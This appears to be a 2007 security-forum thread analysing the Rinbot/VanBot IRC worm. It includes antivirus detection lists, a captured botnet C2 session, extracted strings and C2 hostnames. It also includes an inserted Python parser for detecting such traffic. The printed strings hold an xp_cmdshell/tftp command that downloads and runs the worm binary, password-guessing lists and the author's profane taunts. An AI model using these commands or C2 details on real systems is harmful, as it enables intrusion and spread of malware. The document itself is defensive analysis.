
Rinbot / Delbot

A generous user provided us with the Rinbot / Delbot sample. However, our scans show it as VanBot.

b09d49c377de3e835eb5bdfc31be5a66

AntiVir 7.3.1.38 03.02.2007 BDS/VanBot.AY.10
Authentium 4.93.8 03.04.2007 W32/Backdoor.AGKF
Avast 4.7.936.0 03.03.2007 no virus found
AVG 7.5.0.447 03.03.2007 Win32/CryptExe
BitDefender 7.2 03.04.2007 Backdoor.VanBot.L
CAT-QuickHeal 9.00 03.02.2007 Backdoor.VanBot.ay
ClamAV devel-20060426 03.03.2007 no virus found
DrWeb 4.33 03.03.2007 BackDoor.IRC.Sdbot.1129
eSafe 7.0.14.0 02.28.2007 Win32.VanBot.ay
eTrust-Vet 30.6.3449 03.03.2007 Win32/Nirbot.N
Ewido 4.0 03.03.2007 Backdoor.VanBot.ay
FileAdvisor 1 03.04.2007 no virus found
Fortinet 2.85.0.0 03.04.2007 W32/SDBot.H!worm
F-Prot 4.3.1.45 03.04.2007 W32/Backdoor.AGKF
F-Secure 6.70.13030.0 03.03.2007 Backdoor.Win32.VanBot.ay
Ikarus T3.1.1.3 03.04.2007 Backdoor.Win32.VanBot.ay
Kaspersky 4.0.2.24 03.04.2007 Backdoor.Win32.VanBot.ay
McAfee 4975 03.02.2007 W32/Sdbot.worm.gen.h
Microsoft 1.2204 03.04.2007 no virus found
NOD32v2 2093 03.03.2007 Win32/Rinbot.D
Norman 5.80.02 03.02.2007 no virus found
Panda 9.0.0.4 03.03.2007 W32/IrnBot.F.worm
Prevx1 V2 03.04.2007 Malware.Trojan.Backdoor.Gen
Sophos 4.14.0 03.03.2007 W32/Sdbot-CZW
Sunbelt 2.2.907.0 03.01.2007 Backdoor.Win32.VanBot.ay
Symantec 10 03.04.2007 W32.Rinbot.H
TheHacker 6.1.6.067 03.01.2007 Backdoor/VanBot.ay
UNA 1.83 03.02.2007 Backdoor.VanBot.19F1
VBA32 3.11.2 03.03.2007 Backdoor.Win32.VanBot.ay
VirusBuster 4.3.19:9 03.03.2007 Worm.Irnbot.B

A couple of interesting things:

00000458 00400458 0
00000CA3 00400CA3 0 DINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDING
0003A058 0043A058 0

I'll unpack it / analyze it tomorrow.

V.

OK, here is the botnet traffic:

NICK [XP|USA|P|00|wxgZxWzE]
USER XP-USA 0 0 :[XP|USA|P|00|wxgZxWzE]
:s004.xnet.net NOTICE AUTH :*** Looking up your hostname...
:s004.xnet.net NOTICE AUTH :*** Couldn't resolve your hostname; using your IP address instead
:s004.xnet.net NOTICE AUTH :*** Couldn't resolve your hostname; using your IP address instead
:s004.xnet.net NOTICE [XP|USA|P|00|wxgZxWzE] :*** If you are having problems connecting due to ping timeouts, please type /quote pong C40DC39B or /raw pong C40DC39B now.
PING :C40DC39B
PONG :C40DC39B
:s004.xnet.net 001 [XP|USA|P|00|wxgZxWzE] :Welcome to the xnet IRC Network [XP|USA|P|00|wxgZxWzE]!XP-USA@
:s004.xnet.net 002 [XP|USA|P|00|wxgZxWzE] :Your host is s004.xnet.net, running version Unreal3.2.5
:s004.xnet.net 003 [XP|USA|P|00|wxgZxWzE] :This server was created Sat Feb 25 19:37:48 2006
:s004.xnet.net 004 [XP|USA|P|00|wxgZxWzE] s004.xnet.net Unreal3.2.5 iowghraAsORTVSxNCWqBzvdHtGp lvhopsmntikrRcaqOALQbSeIKVfMCuzNTGj
:s004.xnet.net 005 [XP|USA|P|00|wxgZxWzE] NAMESX SAFELIST HCN MAXCHANNELS=10 CHANLIMIT=#:10 MAXLIST=b:60,e:60,I:60 NICKLEN=30 CHANNELLEN=32 TOPICLEN=307 KICKLEN=307 AWAYLEN=307 MAXTARGETS=20 WALLCHOPS :are supported by this server
:s004.xnet.net 005 [XP|USA|P|00|wxgZxWzE] WATCH=128 SILENCE=15 MODES=12 CHANTYPES=# PREFIX=(qaohv)~&@%+ CHANMODES=beI,kfL,lj,psmntirRcOAQKVCuzNSMTG NETWORK=xnet CASEMAPPING=ascii EXTBAN=~,cqnr ELIST=MNUCT STATUSMSG=~&@%+ EXCEPTS INVEX :are supported by this server
:s004.xnet.net 005 [XP|USA|P|00|wxgZxWzE] CMDS=KNOCK,MAP,DCCALLOW,USERIP :are supported by this server
MODE [XP|USA|P|00|wxgZxWzE] -x
JOIN ##CNN THISISCNN
:s004.xnet.net 422 [XP|USA|P|00|wxgZxWzE] :MOTD File is missing
:[XP|USA|P|00|wxgZxWzE] MODE [XP|USA|P|00|wxgZxWzE] :+iwx
:[XP|USA|P|00|wxgZxWzE] MODE [XP|USA|P|00|wxgZxWzE] :-x
:[XP|USA|P|00|wxgZxWzE]!XP-USA@ JOIN :##CNN
:s004.xnet.net 332 [XP|USA|P|00|wxgZxWzE] ##CNN :.scan.stop -s;.scan.start N 30 -s;.scan.start N 30 -a -s;.scan.start N x.x.x.x 30 -s;.scan.start M 15 -a -s;.scan.start M 15 -s;.scan.start M x.x.x.x 15 -s;.scan.start S 15 -a -s;.scan.start S 15 -s;.scan.start S x.x.x.x 15 -s
:s004.xnet.net 333 [XP|USA|P|00|wxgZxWzE] ##CNN ncjml 1172975826
:s004.xnet.net 353 [XP|USA|P|00|wxgZxWzE] @ ##CNN :[XP|USA|P|00|wxgZxWzE] @a @b
:s004.xnet.net 366 [XP|USA|P|00|wxgZxWzE] ##CNN :End of /NAMES list.
PING :s004.xnet.net
PONG :s004.xnet.net
:a`!a@AC9CB846.49DBB37.80282C88.IP MODE ##CNN +o a`
:a!a@AC9CB846.49DBB37.80282C88.IP QUIT :[irc.xnet.net] Local kill by a` (die)
PING :s004.xnet.net
PONG :s004.xnet.net
:b!you@state.of.z3n QUIT :Operation would block
:a`!a@AC9CB846.49DBB37.80282C88.IP QUIT :Client exited
:a!a@AC9CB846.49DBB37.80282C88.IP MODE ##CNN +o a
:b!you@xnet.x MODE ##CNN +o b
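The session above is plain-text IRC, so its C2 markers can be pulled out with a simple line parser. The following Python is an added example written for this page, not code from the original post: it flags the bracketed bot-style nick, the server that answered registration, the JOIN with a channel key, and the dot-commands carried in the channel topic (the 332 reply), run over constructed lines modelled on the capture.

```python
import re

# Constructed sample session modelled on the capture in the post; the nick,
# channel and server name are taken from the post, the topic is shortened.
SAMPLE_SESSION = """\
NICK [XP|USA|P|00|wxgZxWzE]
USER XP-USA 0 0 :[XP|USA|P|00|wxgZxWzE]
:s004.xnet.net 001 [XP|USA|P|00|wxgZxWzE] :Welcome to the xnet IRC Network [XP|USA|P|00|wxgZxWzE]!XP-USA@
JOIN ##CNN THISISCNN
:s004.xnet.net 332 [XP|USA|P|00|wxgZxWzE] ##CNN :.scan.stop -s;.scan.start N 30 -s;.scan.start M 15 -a -s
:s004.xnet.net 353 [XP|USA|P|00|wxgZxWzE] @ ##CNN :[XP|USA|P|00|wxgZxWzE] @a @b
PING :s004.xnet.net
PONG :s004.xnet.net
"""

# Nicks of this family pack OS, country and a random tag into pipe-separated
# brackets, e.g. [XP|USA|P|00|wxgZxWzE]; require at least four fields.
BOT_NICK_RE = re.compile(r"^\[[^\]|]+(?:\|[^\]|]+){3,}\]$")
# A topic-borne command is a dot-verb such as .scan.start at the start of a ';' field.
TOPIC_VERB_RE = re.compile(r"^\.(\w+(?:\.\w+)*)")


def parse_irc_line(line):
    """Split one raw IRC line into (prefix, command, params, trailing)."""
    prefix = None
    if line.startswith(":"):
        prefix, _, line = line[1:].partition(" ")
    head, sep, trailing = line.partition(" :")
    parts = head.split()
    return prefix, parts[0].upper(), parts[1:], (trailing if sep else None)


def flag_bot_markers(session_text):
    """Return (reason, detail) pairs for the C2 markers seen in a session transcript."""
    findings = []
    for raw in session_text.splitlines():
        if not raw.strip():
            continue
        prefix, cmd, params, trailing = parse_irc_line(raw)
        if cmd == "NICK" and params and BOT_NICK_RE.match(params[0]):
            findings.append(("bot-style nick", params[0]))
        elif cmd == "001" and prefix:
            # RPL_WELCOME is sent by the server the client registered with
            findings.append(("c2 server", prefix))
        elif cmd == "JOIN" and len(params) >= 2:
            # A second JOIN parameter is a channel key; record the channel only
            findings.append(("join with channel key", params[0]))
        elif cmd == "332" and trailing:
            # RPL_TOPIC: the bot treats the topic as a ';'-separated command queue
            verbs = set()
            for field in trailing.split(";"):
                m = TOPIC_VERB_RE.match(field.strip())
                if m:
                    verbs.add(m.group(1))
            if verbs:
                findings.append(("commands in channel topic", ", ".join(sorted(verbs))))
    return findings


def is_likely_bot_session(session_text):
    """A bot-style nick plus commands delivered via the topic is this family's signature."""
    reasons = {reason for reason, _ in flag_bot_markers(session_text)}
    return {"bot-style nick", "commands in channel topic"} <= reasons
```

The same parser can be fed a transcript reassembled from a packet capture; the server name and channel it reports are the indicators to block at the egress firewall.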

rinbot strings

Some data:
OCID 2222587770 | F-Prot:W32/Spybot.MGZ | BitDefender: Generic.Sdbot.4F162F4F | Kaspersky: Backdoor.Win32.Rbot.gen| ClamAV: /malware.exe | AntiVir: | Avast: Win32:Spybot-A2173 [Trj]| Avg: Trojan horse IRC/BackDoor.SdBot.190.AD| File Size: 212K md5sum: e47f9d6177ad1afd89e27d427f8a1aca | sha1sum: e037699ed7d0096a9f889cba4e1f0b3ac9319f50 | sha2sum: 58efa854f0ec7a685bfc99bfe25283bd86952e8d354f2c15ce3e0f6c323e2e9c

Of particular interest in the strings is:

Tonight on CNN An interview with the authors of Rinbot. Who are you Hackers. Are you actually disgruntled No. Then why are you actively going after Symantec The worm is designed for getting the highest yield of computers infected, not to aggravate Symantec there is no hate. So why attack the Symantec antivirus program A lot of businesses and universities run the application, making it a prime target for exploitation. Are you aware that your worm is crippling computer networks Yes that can happen on slow networks or networks with many computers the worm also searches and removes other worms from the system, acting as a small antivirus program if you will. If you wish not to have those problems keep your software updated. Why did you taunt Symantec and other security companies They were the first to list the worm on their site and try and get servers shut down. What do you intent to use the infected computers for Nothing very malicious no fraud or anything like that. What is the real name of the worm and how did you come up with it The real name is IrnBot, it is named after a popular soft drink called IrnBru. Thank you for your time author of Rinbot. You are very welcome CNN, thank you for the opportunity to explain.

The above is in one of the spawned processes.

tftp i s GET irn.exestart irn.exeexit
This tells me it has tftp capabilities to go grab a file

EXEC master..xp_cmdshell tftp i s GET irn.exestart irn.exeexit
This tells me it targets MSSQL stored procedures to run tftp.

HTTP Transfer d.d.d.d N/A. d Total Sends.
This tells me it has http call back capabilities

Dear Symantec For years I have longed for just one thing, to make malware with just the right sting, you detected my creation and got my domains killed, but I will not stop, I can rebuild. P.S. Fuck you assholes.
This tells me the author has a sense of humor / grudge.

sqlpassoainstall
databasepassword
domainpassword
There's what looks to be a whole bunch of usernames and passwords; maybe it tries to crack them.

s Exploited s.
admin
root
s Exploited s.
\\s\pipe\browser
\\s\ipc
Similar to above, maybe it does smb account cracking

scan.stats
scan.stop
scan.start
Some kind of scanner?

.AVmdlScanner
.AVmdlScanStop

Scans for antivirus?

STRINGS:

rinbot

Our network had been infiltrated with this. We've been doing the obvious... but all is not well. We have one server in particular that periodically reboots. It does appear that the 'scan' is being run approximately 15 seconds after the Symantec anti-virus service is loaded. I don't see this in the server logs until after the initial attack.

Any thoughts?

We'd be happy

To come out and help (take a look at our Consulting Services link at the top left :)

However, I'm still analyzing this. The first thing I would do is block outgoing IRC, especially to hosts that look like s004.xnet.net on port 8080. Make sure all your passwords are up to date and complex (it looks like it cracks SMB accounts).

More later.

V.

Quick Analysis Notes

It's doing lookups for:
x.rofflewaffles.us
x.pennysheet.com
crusade.godhatesfags.com
x.sans-security.org
Tries to connect to IRC servers running on ports 7998 and 8080. For 7998, it joins channel "##GHF" with password "weh4t3youall".

Blah blah blah, I'm mostly interested in the SYM06-010 exploit. It's located at 0x004255E0 in the unpacked (running) bot's memory. It's referenced from 0x0041B1BE, where it's the argument to a WS2_32.SEND.

In context:
0x0041B19E is a connect() call
0x0041B19B CMP EAX, -1 ; check return from connect()
0x0041B19E JNZ short 0x0041B1B7
[...]
0x0041B1B7 6A 00 ; PUSH 0
0x0041B1B9 68 13120000 ; PUSH 4627.0
0x0041B1BE 68 E0554200 ; The SYM06-010 Exploit String
0x0041B1C3 56 ; PUSH ESI
0x0041B1C4 FF15 28F24100 ; CALL WS2_32.SEND

Strangely, the length of the SYM06-010 exploit only seems to be 0x0B6F bytes, not 0x1213.

Anyway, I need to spend more than five minutes digging into this. The shellcode this bot uses is different from the shellcode used by the recent Big Yellow worm.


... Otherwise the exploits are byte for byte identical.

More details later...


A CNN Interview From Inside Rinbot

Tonight on CNN: An interview with the author(s) of Rinbot. Who are you? Hacker(s).
Are you actually disgruntled? No. Then why are you actively going after Symantec?
The worm is designed for getting the highest yield of computers infected, not to
aggravate Symantec; there is no hate. So why attack the Symantec anti-virus program?
A lot of businesses and universities run the application, making it a prime target for
exploitation. Are you aware that your worm is crippling computer networks? Yes that
can happen on slow networks or networks with many computers; the worm also searches
and removes other worms from the system, acting as a small anti-virus program if you
will. If you wish not to have those problems keep your software updated. Why did you
taunt Symantec and other security companies? They were the first to list the worm on
their site and try and get servers shut down. What do you intent to use the infected
computers for? Nothing very malicious; no fraud or anything like that. What is the
real name of the worm and how did you come up with it? The real name is IrnBot, it
is named after a popular soft drink called IrnBru. Thank you for your time author of
Rinbot. You are very welcome CNN, thank you for the opportunity to explain.